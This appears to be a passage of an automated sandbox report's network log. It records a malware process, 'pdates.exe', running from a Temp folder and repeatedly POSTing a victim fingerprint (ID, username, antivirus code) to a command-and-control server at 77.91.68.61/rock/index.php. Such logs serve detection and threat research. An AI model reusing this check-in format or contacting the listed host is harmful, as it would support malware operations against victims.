Jul 27, 2023 01:33:42.947930098 CEST	3708	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:42.996402025 CEST	3708	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
151	192.168.2.5	49869	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:43.156233072 CEST	3709	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:43.204761028 CEST	3709	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
152	192.168.2.5	49870	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:43.377254009 CEST	3710	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:43.425538063 CEST	3710	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
153	192.168.2.5	49871	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:43.575824976 CEST	3711	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:43.624749899 CEST	3711	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
154	192.168.2.5	49872	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:43.789129019 CEST	3712	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:43.837945938 CEST	3712	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
155	192.168.2.5	49873	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:44.019273043 CEST	3713	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:44.067080975 CEST	3713	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
156	192.168.2.5	49874	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:44.227988958 CEST	3714	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:44.275913954 CEST	3714	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
157	192.168.2.5	49875	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:47.432065010 CEST	3715	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:47.483247995 CEST	3715	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
158	192.168.2.5	49876	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:47.709750891 CEST	3716	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:47.758718967 CEST	3716	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
159	192.168.2.5	49877	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:47.951529980 CEST	3717	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:48.000155926 CEST	3717	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.5	49732	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:06.263926029 CEST	2849	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:06.313858032 CEST	2849	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
160	192.168.2.5	49878	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:48.156223059 CEST	3718	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:48.204979897 CEST	3718	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
161	192.168.2.5	49879	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:48.376681089 CEST	3719	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:48.426760912 CEST	3719	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
162	192.168.2.5	49880	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:48.594233036 CEST	3720	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:48.643224001 CEST	3720	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
163	192.168.2.5	49881	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:48.792063951 CEST	3721	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:48.840384960 CEST	3721	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
164	192.168.2.5	49882	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:49.013005972 CEST	3722	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:49.061811924 CEST	3722	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
165	192.168.2.5	49883	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:49.237848043 CEST	3723	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:49.286613941 CEST	3723	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
166	192.168.2.5	49884	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:49.452519894 CEST	3723	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:49.525623083 CEST	3724	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
167	192.168.2.5	49885	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:49.712986946 CEST	3724	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:49.771796942 CEST	3725	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
168	192.168.2.5	49886	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:49.970875978 CEST	3725	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:50.021749973 CEST	3726	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
169	192.168.2.5	49887	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:50.182462931 CEST	3726	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:50.230967999 CEST	3727	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.5	49733	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:06.485443115 CEST	2850	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:06.536987066 CEST	2850	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
170	192.168.2.5	49888	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:50.387784004 CEST	3727	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:50.436274052 CEST	3728	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
171	192.168.2.5	49889	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
